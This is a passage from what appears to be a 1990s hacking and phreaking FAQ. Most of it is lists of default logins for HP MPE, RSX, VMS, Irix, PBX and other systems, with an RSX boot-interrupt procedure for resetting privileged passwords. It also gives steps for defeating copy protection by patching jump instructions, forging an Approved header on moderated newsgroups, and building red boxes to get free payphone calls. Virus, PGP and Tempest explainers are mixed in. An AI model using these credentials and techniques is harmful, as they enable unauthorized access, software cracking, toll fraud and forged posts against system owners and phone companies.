  1801. OPERATOR        DISC
  1802. MGR             HPDESK
  1803. MGR             HPWORD
  1804. FIELD           HPWORD
  1805. MGR             HPOFFICE
  1806. SPOOLMAN        HPOFFICE
  1807. ADVMAIL         HPOFFICE
  1808. MAIL            HPOFFICE
  1809. WP              HPOFFICE
  1810. MANAGER         HPOFFICE
  1811. MGR             HPONLY
  1812. FIELD           HPP187
  1813. MGR             HPP187
  1814. MGR             HPP189
  1815. MGR             HPP196
  1816. MGR             INTX3
  1817. MGR             ITF3000
  1818. MANAGER         ITF3000
  1819. MAIL            MAIL
  1820. MGR             NETBASE
  1821. MGR             REGO
  1822. MGR             RJE
  1823. MGR             ROBELLE
  1824. MANAGER         SECURITY
  1825. MGR             SECURITY
  1826. FIELD           SERVICE
  1827. MANAGER         SYS
  1828. MGR             SYS
  1829. PCUSER          SYS
  1830. RSBCMON         SYS
  1831. OPERATOR        SYS
  1832. OPERATOR        SYSTEM
  1833. FIELD           SUPPORT
  1834. OPERATOR        SUPPORT
  1835. MANAGER         TCH
  1836. MAIL            TELESUP
  1837. MANAGER         TELESUP
  1838. MGR             TELESUP
  1839. SYS             TELESUP
  1840. MGE             VESOFT
  1841. MGE             VESOFT
  1842. MGR             WORD
  1843. MGR             XLSERVER
  1844.  
  1845. Common jobs are Pub, Sys, Data
  1846. Common passwords are HPOnly, TeleSup, HP, MPE, Manager, MGR, Remote
  1847.  
  1848.  
  1849. Major BBS
  1850. ~~~~~~~~~
  1851. Sysop           Sysop
  1852.  
  1853.  
  1854. Mitel PBX
  1855. ~~~~~~~~~
  1856. SYSTEM
  1857.  
  1858.  
  1859. NeXTSTEP
  1860. ~~~~~~~~
  1861. root            NeXT
  1862. signa           signa
  1863.  
  1864.  
  1865. Nomadic Computing Environment (NCE) on the Tadpole Technologies SPARCBook3
  1866. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  1867. fax             <no password>
  1868.  
  1869.  
  1870. PICK O/S
  1871. ~~~~~~~~
  1872. DSA             # Desquetop System Administrator
  1873. DS
  1874. DESQUETOP
  1875. PHANTOM
  1876.  
  1877.  
  1878. Prolog
  1879. ~~~~~~
  1880. PBX             PBX
  1881. NETWORK         NETWORK
  1882. NETOP           <null>
  1883.  
  1884.  
  1885. Rolm
  1886. ~~~~
  1887. CBX Defaults
  1888.  
  1889. op              op
  1890. op              operator
  1891. su              super
  1892. admin           pwp
  1893. eng             engineer
  1894.  
  1895.  
  1896. PhoneMail Defaults
  1897.  
  1898. sysadmin        sysadmin
  1899. tech            tech
  1900. poll            tech
  1901.  
  1902.  
  1903. RSX
  1904. ~~~
  1905. SYSTEM/SYSTEM   (Username SYSTEM, Password SYSTEM)
  1906. 1,1/system      (Directory [1,1] Password SYSTEM)
  1907. BATCH/BATCH
  1908. SYSTEM/MANAGER
  1909. USER/USER
  1910.  
  1911. Default accounts for Micro/RSX:
  1912.  
  1913.         MICRO/RSX
  1914.  
  1915. Alternately you can hit <CTRL-Z>  when the boot sequence asks you for the
  1916. date and create an account using:
  1917.  
  1918.         RUN ACNT
  1919.         or  RUN $ACNT
  1920.  
  1921. (Numbers below 10 {oct} are Priveleged)
  1922.  
  1923. Reboot and wait for the date/time question. Type ^C and at the MCR prompt,
  1924. type "abo at." You must include the . dot!
  1925.  
  1926. If this works, type "acs lb0:/blks=1000" to get some swap space so the
  1927. new step won't wedge.
  1928.  
  1929. type " run $acnt" and change the password of any account with a group
  1930. number of 7 or less.
  1931.  
  1932. You may find that the ^C does not work. Try ^Z and ESC as well.
  1933. Also try all 3 as terminators to valid and invalid times.
  1934.  
  1935. If none of the above work, use the halt switch to halt the system,
  1936. just after a invalid date-time.  Look for a user mode PSW 1[4-7]xxxx.
  1937. then deposit 177777 into R6, cross your fingers, write protect the drive
  1938. and continue the system.  This will hopefully result in indirect blowing
  1939. up...  And hopefully the system has not been fully secured.
  1940.  
  1941.  
  1942. SGI Irix
  1943. ~~~~~~~~
  1944. 4DGifts         <no password>
  1945. guest           <no password>
  1946. demos           <no password>
  1947. lp              <no password>
  1948. nuucp           <no password>
  1949. tour            <no password>
  1950. tutor           <no password>
  1951.  
  1952.  
  1953. System 75
  1954. ~~~~~~~~~
  1955. bcim            bcimpw
  1956. bciim           bciimpw
  1957. bcms            bcmspw, bcms
  1958. bcnas           bcnspw
  1959. blue            bluepw
  1960. browse          looker, browsepw
  1961. craft           crftpw, craftpw, crack
  1962. cust            custpw
  1963. enquiry         enquirypw
  1964. field           support
  1965. inads           indspw, inadspw, inads
  1966. init            initpw
  1967. kraft           kraftpw
  1968. locate          locatepw
  1969. maint           maintpw, rwmaint
  1970. nms             nmspw
  1971. rcust           rcustpw
  1972. support         supportpw
  1973. tech            field
  1974.  
  1975.  
  1976. Taco Bell
  1977. ~~~~~~~~~
  1978. rgm             rollout
  1979. tacobell        <null>
  1980.  
  1981.           
  1982. Verifone Junior 2.05
  1983. ~~~~~~~~~~~~~~~~~~~~
  1984. Default password: 166816
  1985.  
  1986.  
  1987. VMS
  1988. ~~~
  1989. field           service
  1990. systest         utep
  1991.  
  1992.  
  1993. XON / XON Junior
  1994. ~~~~~~~~~~~~~~~~
  1995. Default password: 166831
  1996.  
  1997.  
  1998. 22. What port is XXX on?
  1999.  
  2000. The file /etc/services on most Unix machines lists the port
  2001. assignments for that machine.  For a complete list of port
  2002. assignments, read RFC (Request For Comments) 1700 "Assigned Numbers"
  2003.  
  2004.  
  2005. 23.  What is a trojan/worm/virus/logic bomb?
  2006.  
  2007. This FAQ answer was written by Theora:
  2008.  
  2009. Trojan:
  2010.  
  2011. Remember the Trojan Horse?  Bad guys hid inside it until they could
  2012. get into the city to do their evil deed.  A trojan computer program is
  2013. similar.  It is a program which does an unauthorized function, hidden
  2014. inside an authorized program.  It does something other than what it
  2015. claims to do, usually something malicious (although not necessarily!),
  2016. and it is intended by the author to do whatever it does.  If it's not
  2017. intentional, its called a 'bug' or, in some cases, a feature :) Some
  2018. virus scanning programs detect some trojans.  Some virus scanning
  2019. programs don't detect any trojans.  No virus scanners detect all
  2020. trojans.
  2021.  
  2022. Virus:
  2023.  
  2024. A virus is an independent program which reproduces itself.  It may
  2025. attach to other programs, it may create copies of itself (as in
  2026. companion viruses).  It may damage or corrupt data, change data, or
  2027. degrade the performance of your system by utilizing resources such as
  2028. memory or disk space.  Some virus scanners detect some viruses.  No
  2029. virus scanners detect all viruses.  No virus scanner can protect
  2030. against "any and all viruses, known and unknown, now and forevermore".
  2031.  
  2032. Worm:
  2033.  
  2034. Made famous by Robert Morris, Jr. , worms are programs which reproduce
  2035. by copying themselves over and over, system to system, using up
  2036. resources and sometimes slowing down the systems.  They are self
  2037. contained and use the networks to spread, in much the same way viruses
  2038. use files to spread.  Some people say the solution to viruses and
  2039. worms is to just not have any files or networks.  They are probably
  2040. correct.  We would include computers.
  2041.  
  2042. Logic Bomb:
  2043.  
  2044. Code which will trigger a particular form of 'attack' when a
  2045. designated condition is met.  For instance, a logic bomb could delete
  2046. all files on Dec.  5th.  Unlike a virus, a logic bomb does not make
  2047. copies of itself.
  2048.  
  2049.  
  2050. 24.  How can I protect myself from viruses and such?
  2051.  
  2052. This FAQ answer was written by Theora:
  2053.  
  2054. The most common viruses are boot sector infectors.  You can help
  2055. protect yourself against those by write protecting all disks which you
  2056. do not need write access to.  Definitely keep a set of write protected
  2057. floppy system disks.  If you get a virus, it will make things much
  2058. simpler.  And, they are good for coasters.  Only kidding.
  2059.  
  2060. Scan all incoming files with a recent copy of a good virus scanner.
  2061. Among the best are F-Prot, Dr.  Solomon's Anti-virus Toolkit, and
  2062. Thunderbyte Anti-Virus.  AVP is also a good proggie.  Using more than
  2063. one scanner could be helpful.  You may get those one or two viruses
  2064. that the other guy happened to miss this month.
  2065.  
  2066. New viruses come out at the rate of about 8 per day now.  NO scanner
  2067. can keep up with them all, but the four mentioned here do the best job
  2068. of keeping current.  Any _good_ scanner will detect the majority of
  2069. common viruses.  No virus scanner will detect all viruses.
  2070.  
  2071. Right now there are about 5600 known viruses.  New ones are written
  2072. all the time.  If you use a scanner for virus detection, you need to
  2073. make sure you get frequent updates.  If you rely on behaviour
  2074. blockers, you should know that such programs can be bypassed easily by
  2075. a technique known as tunnelling.
  2076.  
  2077. You may want to use integrity checkers as well as scanners.  Keep in
  2078. mind that while these can supply added protection, they are not
  2079. foolproof.
  2080.  
  2081. You may want to use a particular kind of scanner, called resident
  2082. scanners.  Those are programs which stay resident in the computer
  2083. memory and constantly monitor program execution (and sometimes even
  2084. access to the files containing programs).  If you try to execute a
  2085. program, the resident scanner receives control and scans it first for
  2086. known viruses.  Only if no such viruses are found, the program is
  2087. allowed to execute.
  2088.  
  2089. Most virus scanners will not protect you against many kinds of
  2090. trojans, any sort of logic bombs, or worms.  Theoretically, they
  2091. _could_ protect you against logic bombs and/or worms, by addition of
  2092. scanning strings; however, this is rarely done.
  2093.  
  2094. The best, actually only way, to protect yourself is to know what you
  2095. have on your system and make sure what you have there is authorised by
  2096. you.  Make freqent backups of all important files.  Keep your DOS
  2097. system files write protected.  Write protect all disks that you do not
  2098. need to write to.  If you do get a virus, don't panic.  Call the
  2099. support department of the company who supplies your anti-virus product
  2100. if you aren't sure of what you are doing.  If the company you got your
  2101. anti-virus software from does not have a good technical support
  2102. department, change companies.
  2103.  
  2104. The best way to make sure viruses are not spread is not to spread
  2105. them.  Some people do this intentionally.  We discourage this. Viruses
  2106. aren't cool.
  2107.  
  2108.  
  2109. 25.  Where can I get more information about viruses?
  2110.  
  2111. This FAQ answer was written by Theora:
  2112.  
  2113. Assembly lanaguage programming books illustrate the (boring) aspect of
  2114. replication and have for a long time.  The most exciting/interesting
  2115. thing about viruses is all the controversy around them.  Free speech,
  2116. legality, and cute payloads are a lot more interesting than "find
  2117. first, find next" calls.  You can get information about the technical
  2118. aspects of viruses, as well as help if you should happen to get a
  2119. virus, from the virus-l FAQ, posted on comp. virus every so often.
  2120. You can also pick up on the various debates there.  There are
  2121. alt.virus type newsgroups, but the level of technical expertise is
  2122. minimal, and so far at least there has not been a lot of real "help"
  2123. for people who want to get -rid- of a virus.
  2124.  
  2125. There are a lot of virus experts.  To become one, just call yourself
  2126. one.  Only Kidding.  Understanding viruses involves understanding
  2127. programming, operating systems, and their interaction.  Understanding
  2128. all of the 'Cult of Virus' business requires a lot of discernment.
  2129. There are a number of good papers available on viruses, and the Cult
  2130. of Virus; you can get information on them from just about anyone
  2131. listed in the virus-l FAQ.  The FTP site ftp.informatik.uni-hamburg.de
  2132. is a pretty reliable site for proggies and text.
  2133.  
  2134.  
  2135. 26. What is Cryptoxxxxxxx?
  2136.  
  2137. This FAQ answer is excerpted from: Computer Security Basics
  2138.                                    by Deborah Russell
  2139.                                    and G.T. Gengemi Sr.
  2140.  
  2141. A message is called either plaintext or cleartext.  The process of
  2142. disguising a message in such a way as to hide its substance is called
  2143. encryption.  An encrypted message is called ciphertext.  The process
  2144. of turning ciphertext back into plaintext is called decryption.
  2145.  
  2146. The art and science of keeping messages secure is called cryptography,
  2147. and it is practiced by cryptographers.  Cryptanalysts are
  2148. practitioners of cryptanalysis, the art and science of breaking
  2149. ciphertext, i.e. seeing through the disguise.  The branch of
  2150. mathematics embodying both cryptography and cryptanalysis is called
  2151. cryptology, and it's practitioners are called cryptologists.
  2152.  
  2153.  
  2154. 27. What is PGP?
  2155.  
  2156. This FAQ answer is excerpted from: PGP(tm) User's Guide
  2157.                                    Volume I: Essential Topics
  2158.                                    by Philip Zimmermann
  2159.  
  2160. PGP(tm) uses public-key encryption to protect E-mail and data files.
  2161. Communicate securely with people you've never met, with no secure
  2162. channels needed for prior exchange of keys.  PGP is well featured and
  2163. fast, with sophisticated key management, digital signatures, data
  2164. compression, and good ergonomic design.
  2165.  
  2166. Pretty Good(tm) Privacy (PGP), from Phil's Pretty Good Software, is a
  2167. high security cryptographic software application for MS-DOS, Unix,
  2168. VAX/VMS, and other computers.  PGP allows people to exchange files or
  2169. messages with privacy, authentication, and convenience.  Privacy means
  2170. that only those intended to receive a message can read it.
  2171. Authentication means that messages that appear to be from a particular
  2172. person can only have originated from that person. Convenience means
  2173. that privacy and authentication are provided without the hassles of
  2174. managing keys associated with conventional cryptographic software.  No
  2175. secure channels are needed to exchange keys between users, which makes
  2176. PGP much easier to use.  This is because PGP is based on a powerful
  2177. new technology called "public key" cryptography.
  2178.  
  2179. PGP combines the convenience of the Rivest-Shamir-Adleman (RSA)
  2180. public key cryptosystem with the speed of conventional cryptography,
  2181. message digests for digital signatures, data compression before
  2182. encryption, good ergonomic design, and sophisticated key management. 
  2183. And PGP performs the public-key functions faster than most other
  2184. software implementations.  PGP is public key cryptography for the
  2185. masses.
  2186.  
  2187.  
  2188. 28. What is Tempest?
  2189.  
  2190. Tempest stands for Transient Electromagnetic Pulse Surveillance
  2191. Technology.
  2192.  
  2193. Computers and other electronic equipment release interference to their
  2194. surrounding environment.  You may observe this by placing two video
  2195. monitors close together.  The pictures will behave erratically until
  2196. you space them apart.
  2197.  
  2198. Although most of the time these emissions are simply annoyances, they
  2199. can sometimes be very helpful.  Suppose we wanted to see what project
  2200. a target was working on.  We could sit in a van outside her office and
  2201. use sensitive electronic equipment to attempt to pick up and decipher
  2202. the emanations from her video monitor.
  2203.  
  2204. Our competitor, however, could shield the emanations from her
  2205. equipment or use equipment without strong emanations.
  2206.  
  2207. Tempest is the US Government program for evaluation and endorsement
  2208. of electronic equipment that is safe from eavesdropping.
  2209.  
  2210.  
  2211. 29. What is an anonymous remailer?
  2212.  
  2213. An anonymous remailer is a system on the Internet that allows you to
  2214. send e-mail anonymously or post messages to Usenet anonymously.
  2215.  
  2216. You apply for an anonymous ID at the remailer site.  Then, when you
  2217. send a message to the remailer, it sends it out from your anonymous ID
  2218. at the remailer.  No one reading the post will know your real account
  2219. name or host name.  If someone sends a message to your anonymous ID,
  2220. it will be forwarded to your real account by the remailer.
  2221.  
  2222.  
  2223. 30. What are the addresses of some anonymous remailers?
  2224.  
  2225. The most popular and stable anonymous remailer is anon.penet.fi,
  2226. operated by Johan Helsingus.  To obtain an anonymous ID, mail
  2227. ping@anon.penet.fi.  For assistance is obtaining an anonymous account
  2228. at penet, mail help@anon.penet.fi.
  2229.  
  2230. To see a list on anonymous remailers, finger
  2231. remailer-list@kiwi.cs.berkeley.edu.
  2232.  
  2233.  
  2234. 31. How do I defeat Copy Protection?
  2235.  
  2236. There are two common methods of defeating copy protection.  The first
  2237. is to use a program that removes copy protection.  Popular programs
  2238. that do this are CopyIIPC from Central Point Software and CopyWrite
  2239. >from  Quaid Software.  The second method involves patching the copy
  2240. protected program.  For popular software, you may be able to locate a
  2241. ready made patch.  You can them apply the patch using any hex editor,
  2242. such as debug or the Peter Norton's DiskEdit.  If you cannot, you must
  2243. patch the software yourself.
  2244.  
  2245. Writing a patch requires a debugger, such as Soft-Ice or Sourcer.  It
  2246. also requires some knowledge of assembly language.  Load the protected
  2247. program under the debugger and watch for it to check the protection
  2248. mechanism.  When it does, change that portion of the code.  The code
  2249. can be changed from JE (Jump on Equal) or JNE (Jump On Not Equal) to
  2250. JMP (Jump Unconditionally).  Or the code may simply be replaced with
  2251. NOP (No Operation) instructions.
  2252.  
  2253.  
  2254. 32. What is 127.0.0.1?
  2255.  
  2256. 127.0.0.1 is a loopback network connection.  If you telnet, ftp, etc...
  2257. to it you are connected to your own machine.
  2258.  
  2259.  
  2260. 33. How do I post to a moderated newsgroup?
  2261.  
  2262. Usenet messages consist of message headers and message bodies.  The
  2263. message header tells the news software how to process the message.
  2264. Headers can be divided into two types, required and optional. Required
  2265. headers are ones like "From" and "Newsgroups."  Without the required
  2266. headers, your message will not be posted properly.
  2267.  
  2268. One of the optional headers is the "Approved" header.  To post to a
  2269. moderated newsgroup, simply add an Approved header line to your
  2270. message header.  The header line should contain the newsgroup
  2271. moderators e-mail address.  To see the correct format for your target
  2272. newsgroup, save a message from the newsgroup and then look at it using
  2273. any text editor.
  2274.  
  2275. A "Approved" header line should look like this:
  2276.  
  2277. Approved: will@gnu.ai.mit.edu
  2278.  
  2279. There cannot not be a blank line in the message header.  A blank line
  2280. will cause any portion of the header after the blank line to be
  2281. interpreted as part of the message body.
  2282.  
  2283. For more information, read RFC 1036: Standard for Interchange of
  2284. USENET messages.
  2285.  
  2286.  
  2287.  
  2288.  
  2289. Section B: Telephony
  2290. ~~~~~~~~~~~~~~~~~~~~
  2291.  
  2292. 01. What is a Red Box?
  2293.  
  2294. When a coin is inserted into a payphone, the payphone emits a set of
  2295. tones to ACTS (Automated Coin Toll System).  Red boxes work by fooling
  2296. ACTS into believing you have actually put money into the phone.  The
  2297. red box simply plays the ACTS tones into the telephone microphone.
  2298. ACTS hears those tones, and allows you to place your call.  The actual
  2299. tones are:
  2300.  
  2301. Nickel Signal      1700+2200  0.060s on
  2302. Dime Signal        1700+2200  0.060s on, 0.060s off, twice repeating
  2303. Quarter Signal     1700+2200  33ms on, 33ms off, 5 times repeating
  2304.  
  2305.  
  2306. 02. How do I build a Red Box?
  2307.  
  2308. Red boxes are commonly manufactured from modified Radio Shack tone
  2309. dialers, Hallmark greeting cards, or made from scratch from readily
  2310. available electronic components.
  2311.  
  2312. To make a Red Box from a Radio Shack 43-141 or 43-146 tone dialer,
  2313. open the dialer and replace the crystal with a new one.  
  2314. The purpose of the new crystal is to cause the * button on your tone
  2315. dialer to create a 1700Mhz and 2200Mhz tone instead of the original
  2316. 941Mhz and 1209Mhz tones.  The exact value of the replacement crystal
  2317. should be 6.466806 to create a perfect 1700Mhz tone and 6.513698 to
  2318. create a perfect 2200mhz tone. A crystal close to those values will
  2319. create a tone that easily falls within the loose tolerances of ACTS.
  2320. The most popular choice is the 6.5536Mhz crystal, because it is the
  2321. eaiest to procure.  The old crystal is the large shiny metal component
  2322. labeled "3.579545Mhz."  When you are finished replacing the crystal,
  2323. program the P1 button with five *'s.  That will simulate a quarter
  2324. tone each time you press P1.
  2325.  
  2326.  
  2327. 03. Where can I get a 6.5536Mhz crystal?
  2328.  
  2329. Your best bet is a local electronics store.  Radio Shack sells them,
  2330. but they are overpriced and the store must order them in.  This takes
  2331. approximately two weeks.  In addition, many Radio Shack employees do
  2332. not know that this can be done.
  2333.  
  2334. Or, you could order the crystal mail order.  This introduces Shipping
  2335. and Handling charges, which are usually much greater than the price of
  2336. the crystal.  It's best to get several people together to share the
  2337. S&H cost.  Or, buy five or six yourself and sell them later.  Some of
  2338. the places you can order crystals are:
  2339.  
  2340. Digi-Key
  2341. 701 Brooks Avenue South
  2342. P.O. Box 677
  2343. Thief River Falls, MN 56701-0677
  2344. (80)344-4539
  2345. Part Number:X415-ND    /* Note: 6.500Mhz and only .197 x .433 x .149! */
  2346. Part Number:X018-ND
  2347.  
  2348. JDR Microdevices:
  2349. 2233 Branham Lane
  2350. San Jose, CA 95124
  2351. (800)538-5000
  2352. Part Number: 6.5536MHZ
  2353.  
  2354. Tandy Express Order Marketing
  2355. 401 NE 38th Street
  2356. Fort Worth, TX 76106
  2357. (800)241-8742
  2358. Part Number: 10068625
  2359.  
  2360. Alltronics
  2361. 2300 Zanker Road
  2362. San Jose CA 95131
  2363. (408)943-9774 Voice
  2364. (408)943-9776 Fax
  2365. (408)943-0622 BBS
  2366. Part Number: 92A057
  2367.  
  2368. Mouser
  2369. (800)346-6873
  2370. Part Number: 332-1066
  2371.  
  2372.  
  2373. 04. Which payphones will a Red Box work on?
  2374.  
  2375. Red Boxes will work on TelCo owned payphones, but not on COCOT's
  2376. (Customer Owned Coin Operated Telephones).
  2377.  
  2378. Red boxes work by fooling ACTS (Automated Coin Toll System) into
  2379. believing you have put money into the pay phone.  ACTS is the
  2380. telephone company software responsible for saying "Please deposit XX
  2381. cents" and listening for the coins being deposited.
  2382.  
  2383. COCOT's do not use ACTS.  On a COCOT, the pay phone itself is
  2384. responsible for determining what coins have been inserted.
  2385.  
  2386.  
  2387. 05. How do I make local calls with a Red Box?
  2388.  
  2389. Payphones do not use ACTS for local calls.  To use your red box for
  2390. local calls, you have to fool ACTS into getting involved in the call.
  2391.  
  2392. One way to do this, in some areas, is by dialing 10288-xxx-xxxx.  This
  2393. makes your call a long distance call, and brings ACTS into the
  2394. picture.
  2395.  
  2396. In other areas, you can call Directory Assistance and ask for the
  2397. number of the person you are trying to reach.  The operator will give
  2398. you the number and then you will hear a message similar to "Your call
  2399. can be completed automatically for an additional 35 cents."  When this
  2400. happens, you can then use ACTS tones.
  2401.  
  2402.  
  2403. 06. What is a Blue Box?
  2404.  
  2405. Blue boxes use a 2600hz tone to size control of telephone switches
  2406. that use in-band signalling.  The caller may then access special
  2407. switch functions, with the usual purpose of making free long distance
  2408. phone calls, using the tones provided by the Blue Box.
  2409.  
  2410.  
  2411. 07. Do Blue Boxes still work?
  2412.  
  2413. Blue Boxes still work in areas using in band signalling.  Modern phone
  2414. switches use out of band signalling.  Nothing you send over the voice
  2415. portion of bandwidth can control the switch.  If you are in an area
  2416. served by a switch using out of band signalling, you can still blue
  2417. box by calling through an area served by older in-band equipment.
  2418.  
  2419.  
  2420. 08. What is a Black Box?
  2421.  
  2422. A Black Box is a 1.8k ohm resistor placed across your phone line to
  2423. cause the phone company equipment to be unable to detect that you have
  2424. answered your telephone.  People who call you will then not be billed
  2425. for the telephone call.  Black boxes do not work under ESS.
  2426.  
  2427.  
  2428. 09. What do all the colored boxes do?
  2429.  
  2430. Acrylic      Steal Three-Way-Calling, Call Waiting and programmable
  2431.          Call Forwarding on old 4-wire phone systems
  2432. Aqua         Drain the voltage of the FBI lock-in-trace/trap-trace
  2433. Beige        Lineman's hand set
  2434. Black        Allows the calling party to not be billed for the call
  2435.          placed
  2436. Blast        Phone microphone amplifier
  2437. Blotto       Supposedly shorts every fone out in the immediate area
  2438. Blue         Emulate a true operator by seizing a trunk with a 2600hz
  2439.          tone
  2440. Brown        Create a party line from 2 phone lines
  2441. Bud          Tap into your neighbors phone line
  2442. Chartreuse   Use the electricity from your phone line
  2443. Cheese       Connect two phones to create a diverter
  2444. Chrome       Manipulate Traffic Signals by Remote Control
  2445. Clear        A telephone pickup coil and a small amp used to make free
  2446.          calls on Fortress Phones
  2447. Color        Line activated telephone recorder
  2448. Copper       Cause crosstalk interference on an extender
  2449. Crimson      Hold button
  2450. Dark         Re-route outgoing or incoming calls to another phone
  2451. Dayglo       Connect to your neighbors phone line
  2452. Divertor     Re-route outgoing or incoming calls to another phone
  2453. DLOC         Create a party line from 2 phone lines
  2454. Gold         Dialout router
  2455. Green        Emulate the Coin Collect, Coin Return, and Ringback tones
  2456. Infinity     Remotely activated phone tap
  2457. Jack         Touch-Tone key pad
  2458. Light        In-use light
  2459. Lunch        AM transmitter
  2460. Magenta      Connect a remote phone line to another remote phone line
  2461. Mauve        Phone tap without cutting into a line
  2462. Neon         External microphone
  2463. Noise        Create line noise
  2464. Olive        External ringer
  2465. Party        Create a party line from 2 phone lines
  2466. Pearl        Tone generator
  2467. Pink         Create a party line from 2 phone lines
  2468. Purple       Telephone hold button
  2469. Rainbow      Kill a trace by putting 120v into the phone line (joke)
  2470. Razz         Tap into your neighbors phone
  2471. Red          Make free phone calls from pay phones by generating
  2472.          quarter tones
  2473. Rock         Add music to your phone line
  2474. Scarlet      Cause a neighbors phone line to have poor reception
  2475. Silver       Create the DTMF tones for A, B, C and D
  2476. Static       Keep the voltage on a phone line high
  2477. Switch       Add hold, indicator lights, conferencing, etc..
  2478. Tan          Line activated telephone recorder
  2479. Tron         Reverse the phase of power to your house, causing your
  2480.          electric meter to run slower
  2481. TV Cable     "See" sound waves on your TV
  2482. Urine        Create a capacitative disturbance between the ring and
  2483.          tip wires in another's telephone headset
  2484. Violet       Keep a payphone from hanging up
  2485. White        Portable DTMF keypad
  2486. Yellow       Add an extension phone
  2487.  
  2488. Box schematics may be retrieved from these FTP sites:
  2489.  
  2490. ftp.netcom.com          /pub/br/bradleym
  2491. ftp.netcom.com          /pub/va/vandal
  2492. ftp.winternet.com       /users/craigb
  2493.  
  2494.  
  2495. 10. What is an ANAC number?
  2496.  
  2497. An ANAC (Automatic Number Announcement Circuit) number is a telephone
  2498. number that plays back the number of the telephone that called it.
  2499. ANAC numbers are convenient if you want to know the telephone number
  2500. of a pair of wires.
  2501.  
  2502.  
  2503. 11. What is the ANAC number for my area?
  2504.  
  2505. How to find your ANAC number:
  2506.  
  2507. Look up your NPA (Area Code) and try the number listed for it. If that
  2508. fails, try 1 plus the number listed for it.  If that fails, try the
  2509. common numbers like 311, 958 and 200-222-2222.  If you find the ANAC
  2510. number for your area, please let us know.
  2511.  
  2512. Note that many times the ANAC number will vary for different switches
  2513. in the same city.  The geographic naming on the list is NOT intended
  2514. to be an accurate reference for coverage patterns, it is for
  2515. convenience only.
  2516.  
  2517. Many companies operate 800 number services which will read back to you
  2518. the number from which you are calling.  Many of these require
  2519. navigating a series of menus to get the phone number you are looking
  2520. for.
  2521.  
  2522.   (800)238-4959   A voice mail system
  2523.   (800)328-2630   A phone sex line
  2524.   (800)568-3197   Info Access Telephone Company's Automated Blocking Line
  2525.   (800)571-8859   A phone sex line
  2526.   (800)692-6447   (800)MY-ANI-IS
  2527. N (800)455-3256   Unknown
  2528.  
  2529. An non-800 ANAC that works nationwide is 404-988-9664.  The one catch
  2530. with this number is that it must be dialed with the AT&T Carrier
  2531. Access Code 10732.
  2532.  
  2533. Another non-800 nationwide ANAC is Glen Robert of Full Disclosure
  2534. Magazine's number, 10555-1-708-356-9646.
  2535.  
  2536. Please use local ANAC numbers if you can, as abuse or overuse kills
  2537. 800 ANAC numbers.
  2538.  
  2539.   NPA  ANAC number      Geographic area
  2540.   ---  ---------------  ---------------------------------------------
  2541.   201  958              Hackensack/Jersey City/Newark/Paterson, NJ
  2542.   202  811              District of Columbia
  2543.   203  970              CT
  2544. N 205  300-222-2222     Birmingham, AL
  2545. N 205  300-555-5555     Many small towns in AL
  2546. N 205  300-648-1111     Dora, AL
  2547. N 205  300-765-4321     Bessemer, AL
  2548. N 205  300-798-1111     Forestdale, AL
  2549. N 205  300-833-3333     Birmingham
  2550. N 205  557-2311         Birmingham, AL
  2551. N 205  811              Pell City/Cropwell/Lincoln, AL
  2552. N 205  841-1111         Tarrant, AL
  2553.   205  908-222-2222     Birmingham, AL
  2554.   206  411              WA (Not US West)
  2555.   207  958              ME
  2556.   209  830-2121         Stockton, CA
  2557.   209  211-9779         Stockton, CA
  2558.   212  958              Manhattan, NY
  2559. U 213  114              Los Angeles, CA (GTE)
  2560.   213  1223             Los Angeles, CA (Some 1AESS switches)
  2561.   213  211-2345         Los Angeles, CA (English response)
  2562.   213  211-2346         Los Angeles, CA (DTMF response)
  2563. N 213  760-2???         Los Angeles, CA (DMS switches)
  2564.   213  61056            Los Angeles, CA
  2565.   214  570              Dallas, TX
  2566.   214  790              Dallas, TX (GTE)
  2567.   214  970-222-2222     Dallas, TX
  2568.   214  970-611-1111     Dallas, TX (Southwestern Bell)
  2569.   215  410-xxxx         Philadelphia, PA
  2570.   215  511              Philadelphia, PA
  2571.   215  958              Philadelphia, PA
  2572. N 216  331              Akron/Canton/Cleveland/Lorain/Youngstown, OH
  2573. N 216  959-9892         Akron/Canton/Cleveland/Lorain/Youngstown, OH
  2574.   217  200-xxx-xxxx     Champaign-Urbana/Springfield, IL
  2575.   219  550              Gary/Hammond/Michigan City/Southbend, IN
  2576.   219  559              Gary/Hammond/Michigan City/Southbend, IN
  2577.   301  958-9968         Hagerstown/Rockville, MD
  2578.   310  114              Long Beach, CA (On many GTE switches)
  2579.   310  1223             Long Beach, CA (Some 1AESS switches)
  2580.   310  211-2345         Long Beach, CA (English response)
  2581.   310  211-2346         Long Beach, CA (DTMF response)
  2582.   312  200              Chicago, IL
  2583.   312  290              Chicago, IL
  2584.   312  1-200-8825       Chicago, IL (Last four change rapidly)
  2585.   312  1-200-555-1212   Chicago, IL
  2586.   313  200-200-2002     Ann Arbor/Dearborn/Detroit, MI
  2587.   313  200-222-2222     Ann Arbor/Dearborn/Detroit, MI
  2588.   313  200-xxx-xxxx     Ann Arbor/Dearborn/Detroit, MI
  2589.   313  200200200200200  Ann Arbor/Dearborn/Detroit, MI
  2590.   314  410-xxxx#        Columbia/Jefferson City/St.Louis, MO
  2591.   315  953              Syracuse/Utica, NY
  2592.   315  958              Syracuse/Utica, NY
  2593.   315  998              Syracuse/Utica, NY
  2594.   317  310-222-2222     Indianapolis/Kokomo, IN
  2595.   317  559-222-2222     Indianapolis/Kokomo, IN
  2596.   317  743-1218         Indianapolis/Kokomo, IN
  2597.   401  200-200-4444     RI
  2598.   401  222-2222         RI
  2599.   402  311              Lincoln, NE
  2600.   404  311              Atlanta, GA
  2601.   404  940-xxx-xxxx     Atlanta, GA
  2602.   404  990              Atlanta, GA
  2603.   405  890-7777777      Enid/Oklahoma City, OK
  2604.   405  897              Enid/Oklahoma City, OK
  2605.   407  200-222-2222     Orlando/West Palm Beach, FL
  2606.   408  300-xxx-xxxx     San Jose, CA
  2607.   408  760              San Jose, CA
  2608.   408  940              San Jose, CA
  2609.   409  951              Beaumont/Galveston, TX
  2610.   409  970-xxxx         Beaumont/Galveston, TX
  2611.   410  200-6969         A
  2612.   410  200-555-1212     A
  2613.   410  811              Annapolis/Baltimore, MD
  2614.   412  711-6633         Pittsburgh, PA
  2615.   412  711-4411         Pittsburgh, PA
  2616.   412  999-xxxx         Pittsburgh, PA
  2617.   413  958              Pittsfield/Springfield, MA
  2618.   413  200-555-5555     Pittsfield/Springfield, MA
  2619.   414  330-2234         Fond du Lac/Green Bay/Milwaukee/Racine, WI
  2620.   415  200-555-1212     San Francisco, CA
  2621.   415  211-2111         San Francisco, CA
